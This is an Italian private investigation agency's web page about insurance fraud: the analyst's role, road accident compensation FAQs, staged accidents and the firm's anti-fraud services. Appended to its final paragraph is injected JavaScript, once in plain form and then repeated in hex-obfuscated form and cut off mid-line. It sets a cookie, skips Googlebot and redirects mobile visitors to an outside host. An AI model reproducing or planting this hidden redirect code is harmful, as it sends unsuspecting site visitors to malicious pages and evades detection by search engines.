Articoli

antifrode assicurativa, analista frodi assicurative

ANALISTA ANTIFRODE ASSICURATIVA

ANALISTA ANTIFRODE ASSICURATIVA O ANCHE INSURANCE FRAUD ANALYST 

Buongiorno, questo post per tentare di dare uno strumento utile a chi si approccia a questa professione o vuole semplicemente saperne di più.

CIR INVESTIGAZIONI  possiamo scrivere con serenità è capofila in Italia nelle attività di investigazioni assicurative #antifrode infatti sin dalla sua nascita nel 1998, l’attività principale il core business è stata l’attività antifrode , nello specifico l’attività di antifrode assicurativa . Oggi l’Istituto di polizia privata CIR oltre a vantare un know-how più che ventennale nel settore è fiduciaria di diverse Compagnie di assicurazione e bancassicurazione, in forte crescita , tanto che, sempre più compagnie di assicurazioni e riassicurazioni stanno convogliando le loro attenzioni in tema di lotta alle frodi scegliendo CIR investigazioni quale loro partner. D’altronde la solidità è confermata e oggettivamente inopinabile dai numeri.

Esempio di descrizione del lavoro dell’investigatore di frodi assicurative

ANALISTA ANTIFRODE ASSICURATIVA

Cosa fa un investigatore di frodi assicurative?

Gli investigatori di frodi assicurative conducono indagini per verificare le richieste di risarcimento e rilevare il modello dietro attività dubbie per trarre vantaggio da un’organizzazione assicurativa.

La descrizione del loro lavoro implica lo svolgimento di ricerche / interviste per identificare e risolvere casi di frode assicurativa o truffa.

Gli investigatori di frodi assicurative gestiscono casi di richieste di risarcimento sospette per confermare se un incidente è intenzionale o inscenato.

Di solito conducono indagini, ricerche e interviste per ottenere informazioni sulla natura di un incidente.

Le loro indagini spesso richiedono di visitare la scena di un incidente, scattare fotografie e raccogliere prove utili.

Nell’ambito dei loro compiti, gli investigatori di frodi assicurative effettuano controlli dei precedenti per scoprire la storia criminale dei ricorrenti / sospettati.

Intervistano anche ricorrenti e testimoni per ottenere le loro dichiarazioni su un incidente.

Di solito, gli Analisti investigatori di frodi assicurative visualizzano filmati video per stabilire i fatti di un caso.

Collaborano con professionisti di vari settori, tra cui medici, agenti di polizia ed esperti IT per valutare le circostanze intorno a un caso e trarre conclusioni logiche.

Collaborano inoltre con avvocati per sviluppare un piano d’azione adeguato per affrontare e risolvere diversi casi di frode assicurativa.

Nell’ambito delle loro responsabilità, gli investigatori di frodi assicurative analizzano i documenti, le prove e le registrazioni finanziarie pertinenti per stabilire il tipo di reato assicurativo.

Inoltre preparano e presentano rapporti di un’indagine alla direzione aziendale per guidare le loro decisioni e fornire raccomandazioni sulle misure appropriate necessarie per ridurre al minimo il rischio di frode.

Nell’adempiere al loro ruolo, gli Analista investigatori di frodi assicurative assistono e sollecitano l’aiuto delle forze dell’ordine per arrestare i sospetti.

La loro descrizione del lavoro comporta anche la preparazione di proposte per il perseguimento di sospetti colpevoli e la restituzione di beni frodati.

ANALISTA ANTIFRODE ASSICURATIVA

Il ruolo dell’investigatore di frodi assicurative comprende i compiti di seguito elencati

  • Intervistare ricorrenti e testimoni per ottenere dichiarazioni orali e scritte riguardanti un caso
  • Effettuare controlli in background per verificare la storia criminale e i record di un attore / sospettato
  • Condurre indagini e ricerche per scoprire il modello di una frode assicurativa e le parti coinvolte
  • Impostare e attuare programmi per il recupero / restituzione di fondi / beni persi
  • Collaborare con agenzie governative e autorità antifrode per affrontare e risolvere frodi assicurative su larga scala
  • Esamina i documenti per verificarne l’autenticità e la possibilità di un falso
  • Visita le scene degli incidenti per ottenere informazioni utili per determinare se un incidente è stato inscenato
  • Istituire una sorveglianza per raccogliere informazioni essenziali per stabilire i fatti di un caso
  • Collaborare con i professionisti medici per verificare se un infortunio o una malattia viene esagerato per incassare una richiesta di risarcimento
  • Scatta fotografie della scena di un incidente per garantire prove che possono essere presentate durante i procedimenti giudiziari
  • Collabora con gli avvocati per sporgere denuncia e sviluppare strategie per la risoluzione di una frode assicurativa
  • Scrivere rapporti su un’indagine e offrire consigli alla direzione aziendale sui modi per limitare i rischi di frode assicurativa
  • Testimoniare come perito durante un’udienza in tribunale
  • Collabora con gli scienziati forensi per analizzare gli oggetti recuperati da una scena
  • Mantenere una conoscenza aggiornata dei cambiamenti / tendenze in un istituto assicurativo / finanziario.

 

Requisiti – Competenze, abilità e conoscenze – per il lavoro di investigatore di frodi assicurative

Se stai pensando di lavorare come investigatore di frodi assicurative, i seguenti sono i requisiti comuni che la maggior parte delle aziende di lavoro si aspetta :

  • Istruzione e formazione di livello superiore: per diventare un investigatore di frodi assicurative è necessaria una laurea o corsi di alta formazione professionale in discipline quali amministrazione aziendale, giustizia penale e studi assicurativi. Anche l’esperienza in un campo delle forze dell’ordine è essenziale per la posizione lavorativa
  • Capacità di ricerca: gli analisti investigatori di frodi assicurative sono abili nel condurre indagini per scoprire discrepanze nei reclami assicurativi, problem solving, acutezza, sprezzo del pericolo.
  • Capacità di intervistare: gli analisti investigatori di frodi assicurative sono in grado di interrogare con garbo e professionalità i testimoni per ottenere informazioni utili per stabilire i fatti di un’indagine
  • Qualità etiche: gli investigatori di frodi assicurative mantengono un alto livello di professionalità nella gestione di un caso per garantire una risoluzione efficace e imparziale di un caso.

Antifrode Assicurativa | ANALISTA ANTIFRODE ASSICURATIVA

Infortunistica stradale, antifrode assicurativa, assicurazioni, incidenti stradali, truffa alle assicurazioni, risarcimento danni

Infortunistica stradale

Infortunistica stradale

  • Se il sinistro avviene in Italia con veicoli stranieri a quale compagnia devo richiedere il risarcimento?La domanda di risarcimento va inoltrata all’ UCI (Ufficio Centrale Italiano), che in seguito indicherà il nominativo della società incaricata di liquidare il danno.
  • Se il sinistro e’ causato da un veicolo non assicurato, non identificato, posto in circolazione contro la volontà del proprietario o assicurato con imprese poste il liquidazione coatta amministrativa, posso ottenere un risarcimento dei danni? Anche in questi casi si può ottenere il risarcimento dei danni attraverso il FONDO DI GARANZIA PER LE VITTIME DELLA STRADA, istituito dalla legge 990/69. Il d.lgs.198/07 (che ha recepito la direttiva 2005/14/Ce ed e’ entrato in vigore alla fine del 2007) ha aggiunto altri due casi nei quali e’ possibile accedere al fondo, ovvero i sinistri causati da veicoli spediti nel territorio della Repubblica italiana da un altro Stato dello Spazio Economico Europeo e sinistri causati da veicoli esteri con targa non corrispondente o non più corrispondente allo stesso veicolo. (Infortunistica stradale)
  • Sono vittima di un sinistro tra due veicoli come terzo trasportato: a quale compagnia mi devo rivolgere?                                                              (Infortunistica stradale)Lei deve essere risarcito indipendentemente dall’accertamento della responsabilità dei conducenti dei veicoli coinvolti nel sinistro. Pertanto deve inoltrare apposita domanda alla compagnia assicuratrice del veicolo sul quale era a bordo al momento del sinistro, seguendo la procedura di risarcimento ordinaria. Se si apre una controversia, la compagnia della parte responsabile puo’ intervenire nel giudizio e estromettere l’altra compagnia riconoscendo la responsabilità del proprio assicurato. In tal caso essa si assume gli oneri del risarcimento, e diviene la parte a cui il danneggiato deve riferirsi. Queste disposizioni, contenute nell’art.141 del codice, si applicano in tutti i casi in cui il terzo trasportato subisca un danno, esclusi quelli in cui il sinistro sia cagionato da caso fortuito.
  • In caso di sinistro con un ciclomotore posso accedere all’indennizzo diretto?Si, ma la nuova procedura di risarcimento diretto si applica soltanto ai ciclomotori immessi in circolazione dal 14 luglio 2006, mentre a quelli già in circolazione a questa data essa si applica soltanto se abbiano volontariamente aderito al nuovo regime.
  • Che cosa è l’indennizzo diretto?Si tratta di una disciplina in vigore dal 2007 che consente di proporre la richiesta di risarcimento dei danni da sinistro stradale direttamente alla propria compagnia di assicurazioni, anziché a quella dell’altro veicolo.Cosa succede se l’assicurazione non intende pagare o riconoscere il danno?Se anche con le trattative non si riesce a raggiungere il risultato che deve essere oggettivo è necessario promuovere un giudizio civile dinanzi al Giudice di Pace e/o Tribunale  per far ordinare il pagamento di tutti i danni materiali e fisici subiti in seguito al sinistro stradale. Il giudice ordinerà anche il pagamento delle spese legali per il giudizio.La compagnia di assicurazioni ha termine 60\90 giorni per formulare una offerta a seconda che vi siano o meno danni fisici. Quindi molto dipende dalla celerità dell’assicurazione.

    Cosa fare in caso di incidente?Se si rimane coinvolti in un incidente stradale è necessario raccogliere sul posto la maggior quantità di informazioni possibili: identità dei conducenti e dei proprietari di veicoli coinvolti (dati anagrafici, indirizzi, recapiti telefonici, dati relativi alla patente …) accertare quali siano le compagnie assicuratrici (nome, agenzia, numero di polizza) dati identificativi e numeri di telefono di eventuali testimoni compilare se possibile il modulo di constatazione amichevole fare intervenire le Autorità se sorgono contestazioni o se la gravità dell’incidente lo richiede.

    Posso chiedere il risarcimento alla MIA compagnia sempre?No, è possibile richiedere l’indennizzo diretto solo nei seguenti casi: 1) l’incidente deve aver coinvolto solo due veicoli, entrambi identificati, regolarmente assicurati ed immatricolati in Italia; 2) se uno dei due veicoli (o entrambi) è un ciclomotore, deve essere targato secondo il nuovo regime di targatura (in vigore dal 14 luglio 2006); 3) se sono stati riportati danni fisici, deve trattarsi di danni alla persona con invalidità permanente non superiore al 9% (quindi lievi); 4) la procedura di risarcimento diretto si applica anche se, oltre ai conducenti, sono coinvolte altre persone che hanno subito anche lesioni gravi (con invalidità permanente superiore al 9%).            (Infortunistica stradale)

    Quando NON posso accedere all’ Indennizzo Diretto?1) quando i sinistri avvengono all’estero; 2) quando sono rimasti coinvolti più di due veicoli; 3) quando il terzo trasportato subisce un danno che supera il massimale previsto dalla legge (euro 774.685,35). In tal caso il risarcimento per la quota che eccede andrà richiesto all’assicuratore del responsabile; 4) nei casi di sinistri per i quali interviene il Fondo di Garanzia.

    Quali sono i termini entro i quali la compagnia deve pagare?La Vostra assicurazione deve formulare un’offerta di risarcimento: a) entro 30 giorni per i danni ai veicoli se il modulo blu di constatazione amichevole è stato sottoscritto da entrambi i conducenti; b) entro 60 giorni per i danni ai veicoli se il modulo blu di constatazione amichevole non è stato sottoscritto da entrambi i conducenti; c) entro 90 giorni per i danni alle persone. Se accettate la somma offerta, l’assicuratore è tenuto a pagare entro 15 giorni. Se non siete soddisfatti dell’offerta o dei motivi che impediscono di formulare la stessa, potrete fare reclamo, mediante raccomandata A.R., alla vostra assicurazione.

    Quali sono i tempi per ottenere il risarcimento?La liquidazione stragiudiziale del danno è subordinata alla verifica di alcuni dati (dinamica del sinistro, prova dei danni e quantificazione del perito, prova dei danni fisici e quantificazione del medico legale). Il processo di acquisizione di questi elementi comporta significative variazioni della tempistica potendosi così passare da poche settimane a molti mesi. In particolare, nel caso in cui vi siano dei feriti è necessario attendere la completa guarigione prima di ritenere chiusa la pratica; se siano intervenute le Autorità, inoltre, devono trascorrere i tempi tecnici prima di poter ottenere il verbale di accertamento (da 90 a 120 gg.).

Infortunistica stradale

 

fonte stralciata: 101 professionisti

FALSO INCIDENTE STRADALE

FALSO INCIDENTE STRADALE

FALSO INCIDENTE STRADALE

Come può avvenire un falso incidente stradale?

accordo tra due automobilisti che, per truffare le Compagnie assicurative, simulano un incidente stradale

un singolo automobilista che denuncia un sinistro mai avvenuto o aggrava le conseguenze di incidenti reali

Come tutelarsi da un falso incidente stradale?

È fondamentale rivolgersi immediatamente alla propria Compagnia assicurativa, e comunque non oltre i 30 giorni dalla comunicazione del sinistro, fornendo la propria versione dei fatti.

In caso contrario, il truffatore potrebbe trarre vantaggio dal fatto che l’assicuratore, trascorsi i 30 giorni, è autorizzato a risarcire silenzio-assenso

La comunicazione da fare alla Compagnia si chiama disconoscimento del sinistro, e va inoltrata alla Compagnia

La Compagnia assicurativa, effettuate tutte le verifiche del caso, mediante assegnazione d’incarico ad un suo fiduciario tecnico per la verifica compatibilità dei danni , e investigativo ( investigatore privato) per raccogliere gli elementi probatori utili che consentiranno successivamente alla Compagnia Assicurativa di agire in due modi:

liquidare il risarcimento al danneggiato, poiché dalle verifiche il sinistro e i danni conseguenti risultano corrispondere alla realtà;

se dalle verifiche emergesse che il sinistro sia stato effettivamente simulato, presentare querela all’autorità giudiziaria.

CIR investigazioni è una realtà nel panorama delle investigazioni private dal 1998 , è fiduciaria di diverse Compagnie Assicurative Italiane, che ad oggi hanno scelto la  sua competenza, la serietà , l’incorruttibilità, e l’indiscussa preparazione in materia del Codice delle Assicurazioni, il suo Staff si compone di Investigatori privati Autorizzati, periti iscritti al Ruolo, Periti ricostruttori ( tecnico ricostruttore analista di incidenti stradali **) , e l’innovazione è la sua area legale utile a poter si confrontare quotidianamente con i patrocinatori dei richiedenti danni, per offrire alle Compagnie Assicurative un prodotto di altro profilo professionale e qualitativo che si differenzia nel mercato degli Investigatori privati assicurativi.

 

 

**L’introduzione nel nostro ordinamento penale del reato di omicidio stradale, rende indispensabile il supporto di consulenti tecnici altamente qualificati con comprovata esperienza  anche nel faticoso ed impegnativo contraddittorio che caratterizza un procedimento giudiziari

ANTIFRODE ASSICURATIVA

ANTIFRODE ASSICURATIVA

C I R investigazioni ha come punta di diamante il reparto di antifrode assicurativa, è da sapere che il C I R investigazione nasce nel lontano 1998 proprio come agenzia investigativa dedita al contrasto e alla prevenzione delle fraudolenze in tema di assicurazioni.

Quindi è nel nostro DNA, il reparto è composto prevalentemente da tre figure professionali ovvero; periti regolarmente iscritti agli albi di appartenenza; dirigenti laureati in giurisprudenza; uomini e donne in quiescenza dalle forze di polizia, questo mix sapientemente livellato negli anni ha fato sì di raggiungere l’apice in materia d’indagini assicurative. Sicuramente leggendo e confrontando anche altri post vi starete chiedendo ma ogni uno dice sempre di essere leader nel settore che siamo meglio di… ecc ecc…si tenga presente che nell’anno 1995/1998 le agenzie investigative in Italia erano relativamente poche, non vi era l’accozzaglia che oggi vedete su internet di fantomatici superspie…. appartenenti ai servizi speciali…alcuni addirittura vantano trentennale esperienza poi se controllate l’anno di rilascio licenza avrà po più di sei sette anni…SONO DAVVERO POCHE  le agenzie investigative in Italia con 20/30 anni di continuità.

La speculazione di denaro sui falsi sinistri stradali è, purtroppo, una realtà assai diffusa nel nostro paese. C I R Investigazioni dispone di una struttura Antifrode denominata “S I A”, collocata nell’ambito della Struttura Sinistri, che si occupa dell’attività di contrasto alle frodi attraverso l’individuazione e la raccolta di prove su sinistri potenzialmente fraudolenti, al fine di ottenere il ritiro della denuncia e/o richiesta danni e massimizzare l’impatto economico, con eventuale proposta di querela che si esplica attraverso le avvocature penali delle mandanti appositamente dedicata. La struttura “S I A”  è suddivisa in “Antifrode Centralizzata” (sede Pomigliano d’Arco), “Antifrode Territoriale” (su tutto il territorio nazionale) .

Gli investigatori della Struttura Antifrode “S I A” provvedono all’istruttoria del sinistro appena conferito (incarichi ad investigatori professionali esterni, consultazione Banche Dati interne ed esterne, accesso ad internet ecc.) e nel caso sospettino la presenza di fenomeni anomali si avvalgono dell’ausilio dell’Analista di intelligence in forza alla struttura. Il processo di Antifrode investigativa “S I A” di CIR investigazioni è ripartito su due funzioni: l’Ufficio Back-Office, con sede a Pomigliano d’Arco, nell’ambito della Direzione Generale e Territoriale nell’ambito della struttura e delle sue filiali .

L’azione di contrasto alle frodi nel settore assicurativo è svolta dall’IVASS anche attraverso la gestione della Banca Dati sui Sinistri r.c. auto (BDS) e la interconnessione con basi informative esterne all’Istituto. https://www.ivass.it/operatori/imprese/antifrode/index.html

Quindi ben venga ogni iniziativa che punti all’abbassamento del costo della RC Auto. È recente l’introduzione di una banca dati contro i furbetti per diminuire le truffe assicurative. L’Archivio Integrato Antifrode è uno strumento gestito dall’Ivass entrato in vigore il 10 giugno 2016.

  investigazioni su sinistri;
  verifica network fiduciari;
  verifica curricula agenti e subagenti.

  accertamenti presso Autorità;
  accertamenti di tipo Sanitario;
  raccolta denuncia;
  stato dei luoghi;
  escussione assicurato;
  profilazione socio- economica.

http://antifrodeassicurativa.blogspot.it/

Indagini complete ed accurate con un know how di 20 anni e con il supporto di un database che contiene la storia di decine di migliaia di sinistri e di frodi assicurative. Una rete di agenti dal solido expertise che coprono tutto il territorio nazionale e che ci consentono di assicurare attività di contrasto alle frodi assicurative ai massimi livelli del settore.

La differenza ed il quid in più di C I R investigazioni in tema di investigazioni assicurative e che trattiamo gli incarichi come servizi d’intelligence cioè attività ad elevata specializzazione utilizzati in casi delicati e particolari per l’acquisizione di informazioni difficilmente conseguibili con strumenti comuni.

 

Antifrode Assicurativa

Antifrode Assicurativa

Servizi di antifrode assicurativa

Società solida con brand da garanzia offre servizi di antifrode assicurativa. Indagini complete ed accurate con un know how di 20 anni e con il supporto di un database ricco d’informazioni. Una rete di investigatori dal solido expertise che coprono tutto il territorio Campano e Molisano e che ci consentono di effettuare attività di contrasto alle frodi assicurative.
Le indagini private in tema di ANTIFRODE ASSICURATIVA sono finalizzati all’accertamento della veridicità dei sinistri in campo assicurativo.
Le attività si compongono giuntamene e disgiuntamente in :
Stato dei luoghi
Veridicità della documentazione medica
Recupero Rapporto Autorità
Escussione assicurato
Escussione controparte
Escussione testimoni
Escussione legale di controparte
F.I.D.O. – Fraud Intelligence Discovery Operation system
Mappatura collegamenti sinistrosità.

A tali attività affianchiamo servizi di intelligence che sono attività ad elevata specializzazione utilizzati in casi delicati e particolari per l’acquisizione di informazioni difficilmente conseguibili con strumenti comuni.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ 